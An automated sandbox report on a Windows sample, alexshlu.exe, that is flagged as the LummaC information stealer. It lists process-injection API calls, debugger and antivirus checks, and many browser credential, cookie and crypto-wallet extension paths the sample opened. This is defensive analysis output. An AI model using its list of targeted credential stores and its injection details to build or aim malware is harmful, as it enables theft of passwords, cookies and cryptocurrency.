                Source: alexshlu.exe, 00000003.00000003.1476498651.0000000000C89000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1476568193.0000000000C8C000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1425694301.0000000000C8D000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1754886041.0000000000C89000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000002.1775564749.0000000000C89000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1774889064.0000000000C89000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1429214534.0000000000C8D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWL
                Source: alexshlu.exe, 00000003.00000003.1565346772.000000000358E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696494690
                Source: alexshlu.exe, 00000003.00000003.1565346772.000000000358E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696494690]
                Source: alexshlu.exe, 00000003.00000003.1565346772.000000000358E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696494690x
                Source: alexshlu.exe, 00000003.00000003.1565346772.000000000358E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696494690
                Source: alexshlu.exe, 00000003.00000003.1565346772.000000000358E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696494690|UE
                Source: C:\Users\user\Desktop\alexshlu.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Users\user\Desktop\alexshlu.exeCode function: 3_2_0043B480 LdrInitializeThunk,3_2_0043B480
                Source: C:\Users\user\Desktop\alexshlu.exeCode function: 0_2_002AD86F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_002AD86F
                Source: C:\Users\user\Desktop\alexshlu.exeCode function: 0_2_002D61A9 mov edi, dword ptr fs:[00000030h]0_2_002D61A9
                Source: C:\Users\user\Desktop\alexshlu.exeCode function: 0_2_002A1B70 mov edi, dword ptr fs:[00000030h]0_2_002A1B70
                Source: C:\Users\user\Desktop\alexshlu.exeCode function: 3_2_002A1B70 mov edi, dword ptr fs:[00000030h]3_2_002A1B70
                Source: C:\Users\user\Desktop\alexshlu.exeCode function: 0_2_002BC275 GetProcessHeap,0_2_002BC275
                Source: C:\Users\user\Desktop\alexshlu.exeCode function: 0_2_002AD86F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_002AD86F
                Source: C:\Users\user\Desktop\alexshlu.exeCode function: 0_2_002AD863 SetUnhandledExceptionFilter,0_2_002AD863
                Source: C:\Users\user\Desktop\alexshlu.exeCode function: 0_2_002B695D IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_002B695D
                Source: C:\Users\user\Desktop\alexshlu.exeCode function: 0_2_002AD4B3 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_002AD4B3
                Source: C:\Users\user\Desktop\alexshlu.exeCode function: 3_2_002AD86F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_002AD86F
                Source: C:\Users\user\Desktop\alexshlu.exeCode function: 3_2_002AD863 SetUnhandledExceptionFilter,3_2_002AD863
                Source: C:\Users\user\Desktop\alexshlu.exeCode function: 3_2_002B695D IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_002B695D
                Source: C:\Users\user\Desktop\alexshlu.exeCode function: 3_2_002AD4B3 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_002AD4B3

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Contains functionality to inject code into remote processes
                Source: C:\Users\user\Desktop\alexshlu.exeCode function: 0_2_002D61A9 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateProcessW,CreateProcessW,VirtualAlloc,VirtualAlloc,GetThreadContext,Wow64GetThreadContext,ReadProcessMemory,ReadProcessMemory,VirtualAllocEx,VirtualAllocEx,GetProcAddress,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,Wow64SetThreadContext,ResumeThread,ResumeThread,0_2_002D61A9
                Injects a PE file into a foreign processes
                Source: C:\Users\user\Desktop\alexshlu.exeMemory written: C:\Users\user\Desktop\alexshlu.exe base: 400000 value starts with: 4D5AJump to behavior
                Source: C:\Users\user\Desktop\alexshlu.exeProcess created: C:\Users\user\Desktop\alexshlu.exe "C:\Users\user\Desktop\alexshlu.exe"Jump to behavior
                Source: C:\Users\user\Desktop\alexshlu.exeCode function: EnumSystemLocalesW,0_2_002C0111
                Source: C:\Users\user\Desktop\alexshlu.exeCode function: GetLocaleInfoW,0_2_002C0170
                Source: C:\Users\user\Desktop\alexshlu.exeCode function: EnumSystemLocalesW,0_2_002C0245
                Source: C:\Users\user\Desktop\alexshlu.exeCode function: GetLocaleInfoW,0_2_002C0290
                Source: C:\Users\user\Desktop\alexshlu.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,0_2_002C0337
                Source: C:\Users\user\Desktop\alexshlu.exeCode function: EnumSystemLocalesW,0_2_002BBB60
                Source: C:\Users\user\Desktop\alexshlu.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,0_2_002BFBD2
                Source: C:\Users\user\Desktop\alexshlu.exeCode function: GetLocaleInfoW,0_2_002C043D
                Source: C:\Users\user\Desktop\alexshlu.exeCode function: GetLocaleInfoW,0_2_002BB5BC
                Source: C:\Users\user\Desktop\alexshlu.exeCode function: EnumSystemLocalesW,0_2_002BFE23
                Source: C:\Users\user\Desktop\alexshlu.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,0_2_002BFEBE
                Source: C:\Users\user\Desktop\alexshlu.exeCode function: EnumSystemLocalesW,3_2_002C0111
                Source: C:\Users\user\Desktop\alexshlu.exeCode function: GetLocaleInfoW,3_2_002C0170
                Source: C:\Users\user\Desktop\alexshlu.exeCode function: EnumSystemLocalesW,3_2_002C0245
                Source: C:\Users\user\Desktop\alexshlu.exeCode function: GetLocaleInfoW,3_2_002C0290
                Source: C:\Users\user\Desktop\alexshlu.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,3_2_002C0337
                Source: C:\Users\user\Desktop\alexshlu.exeCode function: EnumSystemLocalesW,3_2_002BBB60
                Source: C:\Users\user\Desktop\alexshlu.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,3_2_002BFBD2
                Source: C:\Users\user\Desktop\alexshlu.exeCode function: GetLocaleInfoW,3_2_002C043D
                Source: C:\Users\user\Desktop\alexshlu.exeCode function: GetLocaleInfoW,3_2_002BB5BC
                Source: C:\Users\user\Desktop\alexshlu.exeCode function: EnumSystemLocalesW,3_2_002BFE23
                Source: C:\Users\user\Desktop\alexshlu.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,3_2_002BFEBE
                Source: C:\Users\user\Desktop\alexshlu.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\alexshlu.exeCode function: 0_2_002AE170 GetSystemTimePreciseAsFileTime,GetSystemTimePreciseAsFileTime,GetSystemTimeAsFileTime,0_2_002AE170
                Source: C:\Users\user\Desktop\alexshlu.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                Source: alexshlu.exe, 00000003.00000003.1707860479.0000000000CFD000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1754886041.0000000000C89000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000002.1775723436.0000000000CFD000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000002.1775564749.0000000000C89000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1774889064.0000000000C89000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1774485750.0000000000C5E000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000002.1775468218.0000000000C64000.00000004.00000020.00020000.00000000.sdmp, alexshlu.exe, 00000003.00000003.1690463169.0000000000CFC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                Source: C:\Users\user\Desktop\alexshlu.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

                Stealing of Sensitive Information

                barindex
                Yara detected LummaC Stealer
                Source: Yara matchFile source: Process Memory Space: alexshlu.exe PID: 7720, type: MEMORYSTR
                Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                Found many strings related to Crypto-Wallets (likely being stolen)
                Source: alexshlu.exe, 00000003.00000003.1669648156.0000000000CFB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/Electrum
                Source: alexshlu.exe, 00000003.00000003.1669648156.0000000000CFB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/ElectronCash
                Source: alexshlu.exe, 00000003.00000003.1669648156.0000000000CFB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\com.liberty.jaxx\IndexedDB
                Source: alexshlu.exe, 00000003.00000003.1669648156.0000000000CFB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: window-state.json
                Source: alexshlu.exe, 00000003.00000003.1669648156.0000000000CFB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/Exodus
                Source: alexshlu.exe, 00000003.00000003.1669648156.0000000000CFB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
                Source: alexshlu.exe, 00000003.00000003.1669648156.0000000000CFB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: keystore
                Tries to harvest and steal browser information (history, passwords, etc)
                Source: C:\Users\user\Desktop\alexshlu.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
                Source: C:\Users\user\Desktop\alexshlu.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
                Source: C:\Users\user\Desktop\alexshlu.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
                Source: C:\Users\user\Desktop\alexshlu.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
                Source: C:\Users\user\Desktop\alexshlu.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
                Source: C:\Users\user\Desktop\alexshlu.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
                Source: C:\Users\user\Desktop\alexshlu.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
                Source: C:\Users\user\Desktop\alexshlu.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
                Source: C:\Users\user\Desktop\alexshlu.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Users\user\Desktop\alexshlu.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\places.sqliteJump to behavior
                Source: C:\Users\user\Desktop\alexshlu.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
                Source: C:\Users\user\Desktop\alexshlu.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
                Source: C:\Users\user\Desktop\alexshlu.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
                Source: C:\Users\user\Desktop\alexshlu.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
                Source: C:\Users\user\Desktop\alexshlu.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
                Source: C:\Users\user\Desktop\alexshlu.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
                Source: C:\Users\user\Desktop\alexshlu.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\cert9.dbJump to behavior
                Source: C:\Users\user\Desktop\alexshlu.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
                Source: C:\Users\user\Desktop\alexshlu.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
                Source: C:\Users\user\Desktop\alexshlu.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
                Source: C:\Users\user\Desktop\alexshlu.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\formhistory.sqliteJump to behavior
                Source: C:\Users\user\Desktop\alexshlu.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
                Source: C:\Users\user\Desktop\alexshlu.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
                Source: C:\Users\user\Desktop\alexshlu.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
                Source: C:\Users\user\Desktop\alexshlu.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\key4.dbJump to behavior
                Source: C:\Users\user\Desktop\alexshlu.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
                Source: C:\Users\user\Desktop\alexshlu.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
                Source: C:\Users\user\Desktop\alexshlu.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
                Source: C:\Users\user\Desktop\alexshlu.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Users\user\Desktop\alexshlu.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
                Source: C:\Users\user\Desktop\alexshlu.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
                Source: C:\Users\user\Desktop\alexshlu.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
                Source: C:\Users\user\Desktop\alexshlu.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
                Source: C:\Users\user\Desktop\alexshlu.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
                Source: C:\Users\user\Desktop\alexshlu.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\logins.jsonJump to behavior
                Source: C:\Users\user\Desktop\alexshlu.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
                Source: C:\Users\user\Desktop\alexshlu.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
                Source: C:\Users\user\Desktop\alexshlu.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
                Source: C:\Users\user\Desktop\alexshlu.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
                Source: C:\Users\user\Desktop\alexshlu.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
                Source: C:\Users\user\Desktop\alexshlu.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
                Source: C:\Users\user\Desktop\alexshlu.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Users\user\Desktop\alexshlu.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
                Source: C:\Users\user\Desktop\alexshlu.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
                Source: C:\Users\user\Desktop\alexshlu.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
                Source: C:\Users\user\Desktop\alexshlu.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
                Source: C:\Users\user\Desktop\alexshlu.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
                Source: C:\Users\user\Desktop\alexshlu.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
                Source: C:\Users\user\Desktop\alexshlu.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
                Source: C:\Users\user\Desktop\alexshlu.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
                Source: C:\Users\user\Desktop\alexshlu.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
                Source: C:\Users\user\Desktop\alexshlu.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
                Source: C:\Users\user\Desktop\alexshlu.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
                Source: C:\Users\user\Desktop\alexshlu.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Source: C:\Users\user\Desktop\alexshlu.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
                Source: C:\Users\user\Desktop\alexshlu.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
                Source: C:\Users\user\Desktop\alexshlu.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
                Source: C:\Users\user\Desktop\alexshlu.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
                Source: C:\Users\user\Desktop\alexshlu.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
                Source: C:\Users\user\Desktop\alexshlu.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
                Source: C:\Users\user\Desktop\alexshlu.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                Source: C:\Users\user\Desktop\alexshlu.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
                Source: C:\Users\user\Desktop\alexshlu.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
                Source: C:\Users\user\Desktop\alexshlu.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
                Source: C:\Users\user\Desktop\alexshlu.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
                Source: C:\Users\user\Desktop\alexshlu.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
                Source: C:\Users\user\Desktop\alexshlu.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
                Source: C:\Users\user\Desktop\alexshlu.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
                Source: C:\Users\user\Desktop\alexshlu.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
                Source: C:\Users\user\Desktop\alexshlu.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
                Source: C:\Users\user\Desktop\alexshlu.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
                Source: C:\Users\user\Desktop\alexshlu.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
                Source: C:\Users\user\Desktop\alexshlu.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\prefs.jsJump to behavior
                Source: C:\Users\user\Desktop\alexshlu.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
                Source: C:\Users\user\Desktop\alexshlu.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
                Source: C:\Users\user\Desktop\alexshlu.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
                Source: C:\Users\user\Desktop\alexshlu.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                Source: C:\Users\user\Desktop\alexshlu.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
                Source: C:\Users\user\Desktop\alexshlu.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
                Source: C:\Users\user\Desktop\alexshlu.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
                Source: C:\Users\user\Desktop\alexshlu.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
                Source: C:\Users\user\Desktop\alexshlu.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
                Source: C:\Users\user\Desktop\alexshlu.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
                Source: C:\Users\user\Desktop\alexshlu.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifdJump to behavior
                Source: C:\Users\user\Desktop\alexshlu.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
                Source: C:\Users\user\Desktop\alexshlu.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
                Source: C:\Users\user\Desktop\alexshlu.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
                Source: C:\Users\user\Desktop\alexshlu.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
                Source: C:\Users\user\Desktop\alexshlu.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
                Source: C:\Users\user\Desktop\alexshlu.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
                Source: C:\Users\user\Desktop\alexshlu.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
                Source: C:\Users\user\Desktop\alexshlu.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
                Source: C:\Users\user\Desktop\alexshlu.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
                Source: C:\Users\user\Desktop\alexshlu.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
                Source: C:\Users\user\Desktop\alexshlu.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\cookies.sqliteJump to behavior
                Source: C:\Users\user\Desktop\alexshlu.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
                Source: C:\Users\user\Desktop\alexshlu.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
                Source: C:\Users\user\Desktop\alexshlu.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
                Source: C:\Users\user\Desktop\alexshlu.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
                Source: C:\Users\user\Desktop\alexshlu.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
